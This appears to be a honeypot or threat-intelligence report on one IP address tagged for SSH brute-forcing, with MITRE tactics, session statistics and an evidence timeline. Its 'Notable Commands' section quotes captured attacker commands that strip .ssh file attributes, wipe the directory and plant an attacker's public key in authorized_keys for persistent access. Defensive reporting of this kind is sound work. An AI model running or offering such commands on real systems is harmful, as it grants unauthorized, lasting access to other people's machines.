45.156.25.130

TAGGED SUSPICIOUS
Threat Confidence
57%
Location
🇳🇱 NL / Amsterdam
ASN
AS56971 · Cgi Global Limited
Cloud Provider
Total Events
122
Above average by volume
Agent Count
1
First / Last Seen
2026-05-24 13:05 — 2026-05-24 13:34
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-24 15:02
blocklist_de:reported
Session Forensics
malware_dropper ×4 credential_probe ×10 opportunistic_bruter ×4
Sessions
18 (8 with login)
Avg Depth Score
0.44
Commands Executed
12
Files Downloaded
4
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
SSH-2.0-libssh_0.9.6
Evidence Timeline
Credential Probe 3d72d282c308 newark_01 · 2026-05-24 13:34
1 20%
Credential Probe 9f13bee06afe newark_01 · 2026-05-24 13:31
1 20%
Malware Dropper fd3ac05dfd99 newark_01 · 2026-05-24 13:28
3 1 1 100%
Opportunistic Bruter d4a31c267321 newark_01 · 2026-05-24 13:28
1 50%
Credential Probe dce3e70019b1 newark_01 · 2026-05-24 13:28
1 20%
Credential Probe 56e0bd0cc513 newark_01 · 2026-05-24 13:25
1 20%
Opportunistic Bruter 37da6dc31b87 newark_01 · 2026-05-24 13:21
1 50%
Malware Dropper e21cffc2625e newark_01 · 2026-05-24 13:21
3 1 1 100%
Credential Probe fba3963f73e4 newark_01 · 2026-05-24 13:21
1 20%
Opportunistic Bruter 9be53c0805ec newark_01 · 2026-05-24 13:18
1 50%
Malware Dropper 4e6367e4b8aa newark_01 · 2026-05-24 13:18
3 1 1 100%
Credential Probe 3bb0c60ecb90 newark_01 · 2026-05-24 13:18
1 20%
Credential Probe 1357ebd166ab newark_01 · 2026-05-24 13:15
1 20%
Malware Dropper 23d1b050e8ce newark_01 · 2026-05-24 13:13
3 1 1 100%
Opportunistic Bruter 9662b6ff10b8 newark_01 · 2026-05-24 13:13
1 50%
Credential Probe e1e8a4854225 newark_01 · 2026-05-24 13:13
1 20%
Credential Probe 8c396f13b787 newark_01 · 2026-05-24 13:09
1 20%
Credential Probe 13bf758f0737 newark_01 · 2026-05-24 13:05
1 20%